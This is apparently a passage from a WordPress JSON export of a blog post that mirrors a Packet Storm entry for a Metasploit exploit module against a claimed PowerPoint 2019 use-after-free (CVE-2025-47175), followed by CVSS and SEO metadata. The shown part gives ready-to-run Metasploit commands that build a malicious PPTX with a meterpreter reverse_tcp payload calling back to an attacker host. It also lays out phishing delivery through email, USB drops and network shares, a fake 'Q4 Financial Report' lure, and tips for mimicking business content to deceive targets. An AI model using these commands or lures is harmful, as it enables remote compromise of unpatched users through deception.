\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n    \\n    1. Email Attachment:\\n       \u2022 Subject: #{datastore[&#8216;EMAIL_SUBJECT&#8217;]}\\n       \u2022 Body: #{datastore[&#8216;EMAIL_BODY&#8217;]}\\n       \u2022 Attach the generated PPTX file\\n    \\n    2. Network Share:\\n       \u2022 Place file on accessible network share\\n       \u2022 Send link to target users\\n       \u2022 Use convincing file name\\n    \\n    3. USB Drop:\\n       \u2022 Copy to USB drive with enticing name\\n       \u2022 Leave in target location\\n    \\n    4. Web Download:\\n       \u2022 Host on web server\\n       \u2022 Send download link via email\/chat\\n    \\n    \u26a0\ufe0f  Social Engineering Tips:\\n       \u2022 Use convincing presentation titles\\n       \u2022 Mimic legitimate business content\\n       \u2022 Target specific departments\/individuals\\n       \u2022 Time delivery for maximum impact\\n    \\n    \ud83c\udfaf Target Environment:\\n       \u2022 Microsoft PowerPoint 2019\/Office 365\\n       \u2022 Unpatched versions (pre-June 2025)\\n       \u2022 Windows operating system\\n        \\&#8221;)\\n      end\\n    end\\n    \\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\n    Usage in Metasploit:\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;\\n    # Generate malicious PPTX file\\n    \\n    use exploit\/windows\/fileformat\/ppt_cve_2025_47175\\n    set FILENAME malicious_presentation.pptx\\n    set SHAPE_NAME \\&#8221;CriticalUpdate\\&#8221;\\n    set SHAPE_ID 9999\\n    set TRIGGER_TEXT \\&#8221;Important Security Update &#8211; Please Review\\&#8221;\\n    set PAYLOAD windows\/meterpreter\/reverse_tcp\\n    set LHOST 192.168.1.100\\n    set LPORT 4444\\n    exploit\\n    \\n    # Use delivery auxiliary module\\n    \\n    use auxiliary\/delivery\/ppt_cve_2025_47175\\n    set PPTX_FILE \/path\/to\/malicious_presentation.pptx\\n    set EMAIL_SUBJECT \\&#8221;Q4 Financial Report\\&#8221;\\n    set EMAIL_BODY \\&#8221;Please find attached the quarterly financial report for review.\\&#8221;\\n    run\\n    \\n    \\n    \\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/212315&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:7.8,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:L\/AC:L\/PR:N\/UI:R\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/212315\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-02T19:42:10&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module exploits a use-after-free vulnerability in Microsoft PowerPoint that allows remote code execution when a user opens a specially crafted PPTX file. The&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,28,12,15,13,53,7,11,5],"class_list":["post-28306","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-78","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Microsoft PowerPoint 2019 Use-After-Free_PACKETSTORM:212315 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=28306\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Microsoft PowerPoint 2019 Use-After-Free_PACKETSTORM:212315 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-12-02T19:42:10&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module exploits a use-after-free vulnerability in Microsoft PowerPoint that allows remote code execution when a user opens a specially crafted PPTX file. The...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=28306\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-02T15:33:20+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"17 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28306#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28306\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Microsoft PowerPoint 2019 Use-After-Free_PACKETSTORM:212315\",\"datePublished\":\"2025-12-02T15:33:20+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28306\"},\"wordCount\":3342,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.8\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=28306#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28306\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28306\",\"name\":\"\ud83d\udcc4 Microsoft PowerPoint 2019 Use-After-Free_PACKETSTORM:212315 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-02T15:33:20+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28306#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=28306\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28306#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Microsoft PowerPoint 2019 Use-After-Free_PACKETSTORM:212315\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Microsoft PowerPoint 2019 Use-After-Free_PACKETSTORM:212315 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=28306","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Microsoft PowerPoint 2019 Use-After-Free_PACKETSTORM:212315 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-12-02T19:42:10&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module exploits a use-after-free vulnerability in Microsoft PowerPoint that allows remote code execution when a user opens a specially crafted PPTX file. The...","og_url":"https:\/\/zero.redgem.net\/?p=28306","og_site_name":"zero redgem","article_published_time":"2025-12-02T15:33:20+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"17 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=28306#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=28306"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Microsoft PowerPoint 2019 Use-After-Free_PACKETSTORM:212315","datePublished":"2025-12-02T15:33:20+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=28306"},"wordCount":3342,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.8","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=28306#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=28306","url":"https:\/\/zero.redgem.net\/?p=28306","name":"\ud83d\udcc4 Microsoft PowerPoint 2019 Use-After-Free_PACKETSTORM:212315 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-02T15:33:20+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=28306#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=28306"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=28306#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Microsoft PowerPoint 2019 Use-After-Free_PACKETSTORM:212315"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/28306","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=28306"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/28306\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=28306"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=28306"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=28306"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}